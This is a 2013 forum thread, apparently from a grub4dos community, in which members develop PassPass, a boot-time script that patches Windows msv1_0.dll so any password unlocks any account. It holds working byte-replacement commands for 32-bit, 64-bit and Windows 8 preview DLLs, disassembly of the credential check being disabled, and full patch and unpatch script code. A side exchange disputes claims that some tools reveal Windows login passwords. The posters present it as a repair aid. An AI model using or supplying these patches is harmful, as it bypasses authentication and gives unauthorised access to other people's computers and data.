3 votes
Gold Member
Posted 12 June 2013 - 05:19 PM
What dll are every body talking?
Please furnish the following info.
Do i need to have it in my pendrive?
No. it is there in \WINDOWS\system32
Instead of WINDOWS, theoretically it can be ANY directory in the root of a drive which Windows is installed on.
Platinum Member
Posted 12 June 2013 - 05:47 PM
@Sherlock
The following line will prevent the boot device from being searched for Windows folders - if I boot from a large USB HDD with multiple partitions, it takes quite a while for it to search the hd0,x partitions when there is no point.
set /a skip = %length% + %skip% + 1 > nul
if not "%?_BOOT:~0,4%"=="%dev:~0,4%" echo Checking %dev%... && call %~pnx0 findDLL %dev%
goto :autoLoop
Member
Posted 12 June 2013 - 06:30 PM
hi guys a little 'off topic' used passpass on win7 32 sp1, 6.1.7601.17514 shown as worked in similar posts.
In the past I'd bootup with a live PE (XP) USB, run a 'bat file' to rename msv1_0.dll then copy same patched to target drive.
After booting up into target drive I'd use a portable app to view the password, this worked for me in XP and I think also in Vista(?)
I ca'nt retest Vista at this time.
Doing the same with an already aquired patched win7 msv1_0.dll to target win7 disk the password could not be seen, from what I remember the portable app (numerous of) would show the pass as something like #root
I would like to see the password in win7 on the target disk after patching msv1_0.dll
any help appreciated
Edited by dummkopf007, 12 June 2013 - 06:34 PM.
Gold Member
Posted 12 June 2013 - 06:45 PM
After booting up into target drive I'd use a portable app to view the password, this worked for me in XP and I think also in Vista(?)
What's the magical app capable of breaking NTLM hash in seconds?
Member
Posted 12 June 2013 - 07:20 PM
ok this one of many works in XP google pc wizard download the zip file, open/run PC Wizard.exe
click configuration tab then the Keys icon
Gold Member
Posted 12 June 2013 - 07:26 PM
Worked -
windows 7 64 bit SP1
version: 6.1.7601.17514
md5: 4c1e16b9a53102c8d6fba587cbcb95de
Did NOT work (patch successful but still needed correct password as if it did not do anything) -
windows 7 64 bit SP0
version: 6.1.7600.16385
md5: f40388a19f3be3cec25656ce07392877
Please try the latest version of the script (r11 as of now) for BOTH the installations.
The Finder
Posted 12 June 2013 - 08:47 PM
Nop,
only it says "No Windows Installation found".
I've tested now on 4 pcs and its the same.
Are you sure you are using a valid grub4dos version, a valid WENV version and the original PassPass.g4b?
Try using this:
!BAT if "%1"=="" goto :usage if "%1"=="isadir" goto :isadir insmod wenv > nul set vol=%1 set sub=System32 set file=msv1_0.dll set found=0 wenv dir %vol%/ > (md)0x3000+0x10 wenv for /f %i in ( (md)0x3000+0x10 ) do exec %0 isadir %i if "%found%"=="0" echo Found NO Windows install on %vol%. goto :EOF :isadir cat --length=0 %vol%/%2/%sub%/%file% > nul || goto :EOF if "%found%"=="0" echo Found possible Windows install(s): set /a found=%found%+1 > nul echo %found%) %vol%/%2/ goto :EOF :usage echo /findwind.g4b echo Find a named file on hard disk echo in a named subdirectory of an unknown directory in root echo this example attempts to find a Window install by looking for echo file msv1_0.dll in ROOT\*whatever*\System32\ echo ----------------------------------------------------------- echo Usage: echo /findwind.g4b (hd0,0) echo to check first partition on first disk echo /findwind.g4b (hd0,1) echo to check second partition on first disk echo /findwind.g4b (hd1,0) echo to check first partition on second disk echo NO checks for validity of supplied parameter!!!
Run for the various disk volumes.
To check the disk volumes available run on command line:
find --devices=h
Wonko
The Finder
Posted 12 June 2013 - 09:07 PM
ok this one of many works in XP google pc wizard download the zip file, open/run PC Wizard.execlick configuration tab then the Keys icon
Besides being totally off topic, it does NOT work in XP (in the sense that it does NOT provide the login password of any NT SAM account).
It does provide a number of other passwords, listed on the homesite:
http://www.cpuid.com.../pc-wizard.html
Passwords (Outlook, Internet Explorer, MSN Messenger, Dialup ...)
I would guess that your memory is not as good as it should be, I never heard of any software capable of retrieving a NT login password "instantly", there are tools that may be able to, but after long hours of computing (unless you have a very large rainbow table and a very fast system):
http://en.wikibooks....ws_XP_Passwords
Please remember that one thing is to access the system, another one is to change or reset a password for a given account and yet another one to recover or retrieve the original password of an account.
If you happen to find such a software (capable of recovering or retrieving the original password of an account in a small amount of time), let us know.
Wonko
Member
Posted 12 June 2013 - 09:36 PM
hi Wonko Passwords (Outlook, Internet Explorer, MSN Messenger, Dialup +......................)
I suggest you try it, just letting you know it works on XP
anyone else tried it apart from reading some of the guff...............................?
it does provide the login password .................... so does Spotmau
Edited by dummkopf007, 12 June 2013 - 09:42 PM.
The Finder
Posted 12 June 2013 - 09:48 PM
hi Wonko Passwords (Outlook, Internet Explorer, MSN Messenger, Dialup +......................)I suggest you try it, just letting you know it works on XP
anyone else tried it apart from reading some of the guff...............................?
it does provide the login password .................... so does Spotmau
Good 
, it doesn't work on my XP, then 
.
I presume that it should be in Configuration -> Passwords.
Maybe you could start a new thread listing the apps that work for your login password, so that other people can test them and report (and provide their own preferred tools).
The only thing that you can be sure about is that unless an entirely new approach to decoding NTLM hashes comes out, PassPass or any grub4dos based script, won' t be able to provide that kind of info..
Wonko
Newbie
Posted 12 June 2013 - 10:00 PM
Please try the latest version of the script (r11 as of now) for BOTH the installations.
In short I must report success with r11 on both installations. That fixed it.
This tool could definitely help me out someday, as I do computer repair on the side for friends. That sometimes leads to friends of friends of friends, which makes it hard to get their password from them in a timely manner (especially later on at night). It is much nicer to be able to give their computer back to them with the password still there, as opposed to haveing to reset it (or wait for a few days to get it from them). I have used KONBOOT in the past, but had to make sure it was the first thing to boot every time.
Edited by maximus57, 12 June 2013 - 10:13 PM.
Platinum Member
Posted 12 June 2013 - 10:20 PM
For Release Preview 32-bit, this works
cat --locate=\x13\x4d\x3b\xc6\x75\x13 --replace=\x13\x4d\x33\xc0 (hd1,1)/windows/system32/msv1_0.dll
Platinum Member
Posted 12 June 2013 - 10:58 PM
@sherlock and WKS
The cat code in PassPass.g4b seems overly complex in that it seems to be testing to see if the dll is 32 bit or 64-bit and then a fairly short byte sequence which could lead to problems.
why not just look for a longish sequence of bytes for both 32 and 64 bit dlls so that the sequence is unique?
e.g.
set n=0
cat --locate=abcdefghijkl --replace=abcdefgZZZkl (hdx,y)/windows/system32/msv1_0.dll && set n=1
cat --locate=opqrstuvwx --replace=opqrstuVWx (hdx,y)/windows/system32/msv1_0.dll && set n=1
..add more here for win8 sequences or different versions
if "%n%"=="1" echo Patch worked || echo Patch did not work
and similar for unpatch.
The Finder
Posted 12 June 2013 - 11:40 PM
why not just look for a longish sequence of bytes for both 32 and 64 bit dlls so that the sequence is unique?
Because the essence is of NOT having a unique sequence, but instead a "wide" (or as wide as possible) one.
The single three bytes patch for 32 bit systems should work for 2k to Windows 7 (and this is the actual genius of Damian 
).
Otherwise you will need a "unique" sequence for each and every version of the .dll, a nightmare, giving the amount of versions that are (or that will be) around (this may or may not - have never checked - comprise "localized" versions).
That is "plan" B (and explains maybe why it has been made some code to detect the exact .dll version and why this piece of info is asked to testers).
The patch you posted (without specifying the version that it refers to, thus contributing to create confusion) is as good as any other , but most probably is "specific" and not "wide" 
.
Wonko
Gold Member
Posted 13 June 2013 - 12:42 AM
For Release Preview 32-bit, this works
cat --locate=\x13\x4d\x3b\xc6\x75\x13 --replace=\x13\x4d\x33\xc0 (hd1,1)/windows/system32/msv1_0.dll
What instruction does it replace by what instruction? I doubt that this patch is too specific (it may not be the case) rather than being a generic one. This also addresses your query:
@sherlock and WKS
The cat code in PassPass.g4b seems overly complex in that it seems to be testing to see if the dll is 32 bit or 64-bit and then a fairly short byte sequence which could lead to problems.
why not just look for a longish sequence of bytes for both 32 and 64 bit dlls so that the sequence is unique?
As I have mentioned in technical details, the 32 bit patch we have used in PassPass tries to "kill" all CMP AX, 10h instructions blindly. Also it has been tested on various versions of DLL to ensure that this operation does not have any visible side effect.
For 64-bit DLLs, life is tough. I tried to do the same and it came up with the following error during log-in "Insufficient resource...blah blah" and the log-in failed for both valid and invalid passwords. Look carefully. Here were are searching a bit longer byte sequence by taking next two bytes into account though not actually replacing those. It narrows down the "blind/" replacements as opposed to 32-bit DLLs.
Now, why are we not doing the same for 32-bit DLLs? Coincidentally, whatever sample DLLs we have tested so far does not have any such "unique" two bytes following the target bytes to be patched.
Gold Member
Posted 13 June 2013 - 12:47 AM
I have used KONBOOT in the past, but had to make sure it was the first thing to boot every time.
Free version of KONBOOT does not support 64 bit Windows. Besides, I have seen KONBOOT failing many a times with an error message, "Dummy BIOS Seems to be in place, fixing SMAP BIOS entries". Success rate with PassPass should be higher, I suppose.
Gold Member
Posted 13 June 2013 - 02:49 AM
if not "%?_BOOT:~0,4%"=="%dev:~0,4%" echo Checking %dev%... && call %~pnx0 findDLL %dev%
What does the highlighted fragment mean?
Platinum Member
Platinum Member
Posted 13 June 2013 - 08:06 AM
For Release Preview 32-bit, this works
cat --locate=\x13\x4d\x3b\xc6\x75\x13 --replace=\x13\x4d\x33\xc0 (hd1,1)/windows/system32/msv1_0.dll
Win 8 Release preview 32-bit Dll Ver 6.2.8400.0 - actually also \x4d\x3b\xc6\x75 and \x3b\xc6\x75\x13 are unique sequences in this dll
50 push eax
53 push ebx
FF 15 00 E1 13 4D call ds:RtlCompareMemory
3B C6 cmp eax, esi
75 13 jnz short loc EE8C
re. generic replacement. If the byte sequence is too short it may affect other parts of the dll. I suppose you could test for that and warn the user:
if %@retval%>=2 pause WARNING: More than one instance found in %file%!
cat --locate=\x3b\xc6\x75\x13 %file% > (md)0x9000+10 if %retval%>=2 pause WARNING: More than one instance found in %file%!
Frequent Member
Posted 13 June 2013 - 09:04 AM
Are you sure you are using a valid grub4dos version, a valid WENV version and the original PassPass.g4b?
Try using this:
!BAT if "%1"=="" goto :usage if "%1"=="isadir" goto :isadir insmod wenv > nul set vol=%1 set sub=System32 set file=msv1_0.dll set found=0 wenv dir %vol%/ > (md)0x3000+0x10 wenv for /f %i in ( (md)0x3000+0x10 ) do exec %0 isadir %i if "%found%"=="0" echo Found NO Windows install on %vol%. goto :EOF :isadir cat --length=0 %vol%/%2/%sub%/%file% > nul || goto :EOF if "%found%"=="0" echo Found possible Windows install(s): set /a found=%found%+1 > nul echo %found%) %vol%/%2/ goto :EOF :usage echo /findwind.g4b echo Find a named file on hard disk echo in a named subdirectory of an unknown directory in root echo this example attempts to find a Window install by looking for echo file msv1_0.dll in ROOT\*whatever*\System32\ echo ----------------------------------------------------------- echo Usage: echo /findwind.g4b (hd0,0) echo to check first partition on first disk echo /findwind.g4b (hd0,1) echo to check second partition on first disk echo /findwind.g4b (hd1,0) echo to check first partition on second disk echo NO checks for validity of supplied parameter!!!
Run for the various disk volumes.
To check the disk volumes available run on command line:
find --devices=h
Wonko
Sorry but i need a little more help.
Where i put all the commands you said?
In the menu.lst?
I'm sorry but i never work with that commands in grub4dos.
When i run the find --devices=h
this is my list
hd0,1
hd0,0
hd1,0
hd1,1
Thanks for your help
The Finder
Posted 13 June 2013 - 09:16 AM
re. generic replacement. If the byte sequence is too short it may affect other parts of the dll. I suppose you could test for that and warn the user:
Why? 
I mean, as I have tried to tell you, the current patch for 32 bit dll (working theoretically for anything from 2K to 7) does replace several instances.
It is designed to do that.
It does that and the result is a patched .dll that works.
If you prefer WindowsGate has worked on 32 bit Windows that way for several years and it still works, without any warning (when it works)
Since we don't pay a fee to patch bytes and it's not like it takes ages, the only issue is philosophical, we are patching more bytes than those needed, but this allows us to cover with the same patch more versions.
Two possible cases when more than one instance is found (and replaced) by design:
))In first case the warning makes no sense since the result is working.
In second case the warning may be useful IF the user could do anything about it. BUT since he/she cannot but patch the .dll and see if it provides access it is superfluous (and it makes no sense because if it's first case instead the samw warning will lead to a working patched dll).
@guimenez
Copy and paste that snippet with notepad to a new plain text file, save it as findwind.g4b and copy it to the root of the stick (or whatever) which you boot with grub4dos.
Boot the stick at the menu choices press "c" to get to command line and type:
find --device4s=h
[ENTER]
This will give you a list of the devices (volumes on hd-like devices) that grub4dos can see.
EXAMPLE:
(hd0,0)
(hd0,1)
(hd1,0)
For each of those run findwind, i.e. type:
/findwind.g4b (hd0,0)
[ENTER]
etc.
Report.
Wonko
Platinum Member
Posted 13 June 2013 - 09:27 AM
@Wonko and Sherlock
Consider this case:
We have two byte sequences we are looking for, one to patch and one to unpatch.
The patch sequence searches for abcde
The unpatch sequence searches for abXYe
Now consider that we have a DLL that has 20 patch sequences and 2 unpatch sequences in its normal state.
When we run 'patch' we replace 20 sequences with the unpatch sequence.
Some other routines in the dll may no longer work - this could have knock on effects (like not validating logon credentials apart from the user pwd entry)
When we run 'unpatch' we restore this 20 sequences and also the 2 sequences that were never patched before.
We now have a corrupted DLL and the MD5 is different!
Now say we run the patch again - this time we patch 22 locations - 2 of which were not patched the first time we ran the patch. Now the MD5 is different again.
Frequent Member
Posted 13 June 2013 - 09:36 AM
/findwind.g4b (hd0,0)[ENTER]
etc.
Report.
Wonko
Many thanks Wonko!!!!
Once again you saved me 
The problem was the wenv file, it was older
Now i've tested in 4 machines and it works flawless :D
Thanks once again
The Finder
Posted 13 June 2013 - 10:02 AM
@Wonko and SherlockNo.
Consider this case:
) we were smart enough to check that the code that we use as patch does not exist before patching (done this manually till now, but nothing prevents to add some code to do it in the program)
, but as long as it works it is good enough.Many thanks Wonko!!!!Yep, that's why it is EXPLICITLY written which version of it to use (and why I prompted you to verify the version).
Once again you saved me
The problem was the wenv file, it was older
Now i've tested in 4 machines and it works flawless
Thanks once again
, if you could share the EXACT §@ç#ing pieces of info about the OS's, and bit width and .dll versions I would be even happier 
.
Platinum Member
Posted 13 June 2013 - 12:07 PM
If you want to add this code feel free. It checks for the unpatch bytes before patching and will refuse to run it if they exist
if this is experimental code, it makes sense to not trash the system or at least warn the user...
:32BitPatch echo 32Bit Patch bytes \x83\xF8\x10 cat --locate=\x83\xF8\x10 %dllPath% > (md)0x9000+10 cat --locate=\x20 (md)0x9000+10 set n1=%@retval% if %n1%==0 goto :warnUser if %n1%>=2 set /p /u ask=WARNING: %n1% instances found in %file%! Press S to skip : if not "%ask%"=="S" cat --hex --locate=\x83\xF8\x10 --replace=\x33\xC0\x90 %dllPath% > nul if "%@retval%"=="0" goto :warnUser goto :patchMessage :64BitPatch echo 64Bit Patch bytes \x48\x3B\xC6\x0F\x85 cat --locate=\x48\x3B\xC6\x0F\x85 %dllPath% > (md)0x9000+10 cat --locate=\x20 (md)0x9000+10 set n1=%@retval% if %n1%==0 goto :warnUser if %n1%>=2 set /p /u ask=WARNING: %n1% instances found in %file%! Press S to skip : if not "%ask%"=="S" cat --hex --locate=\x48\x3B\xC6\x0F\x85 --replace=\x33\xC0\x90\x0F\x85 %dllPath% > nul if "%@retval%"=="0" goto :warnUser :patchMessage echo echo DLL at %2\%3 patched goto :EOF :warnUser echo pause The DLL is not compatible or has been already patched configfile %patchDrv% goto :EOF :: Unpatches DLL file, %1 = patchDLL, %2 = (hdX,Y), %3 = WinDir :unPatchDLL set dllPath = %2/%3%dll% :: Check for 0x6486 to identify 64-bit PE cat --locate=\x64\x86 %dllPath% > nul if not "%@retval%"=="0" goto :64BitUnpatch :32BitUpatch echo 32BitUnpatch cat --locate=\x33\xC0\x90 %dllPath% > (md)0x9000+10 cat --locate=\x20 (md)0x9000+10 if %@retval%>=2 set /p /u ask=WARNING: More than one instance found in %file%! Press S to skip : if not "%ask%"=="S" cat --hex --locate=\x33\xC0\x90 --replace=\x83\xF8\x10 %dllPath% > nul if "%@retval%"=="0" goto :warnUserU goto :unpatchMessage :64BitUnpatch echo 64BitUnpatch cat --locate=\x33\xC0\x90\x0F\x85 %dllPath% > (md)0x9000+10 cat --locate=\x20 (md)0x9000+10 if %@retval%>=2 set /p /u ask=WARNING: More than one instance found in %file%! Press S to skip : if not "%ask%"=="S" cat --hex --locate=\x33\xC0\x90\x0F\x85 --replace=\x48\x3B\xC6\x0F\x85 %dllPath% > nul if "%@retval%"=="0" goto :warnUserU :unpatchMessage echo echo DLL at %2\%3 unpatched goto :EOF :warnUserU echo pause The DLL is not compatible or has been already unpatched configfile %patchDrv% goto :EOF
0 members, 2 guests, 0 anonymous users
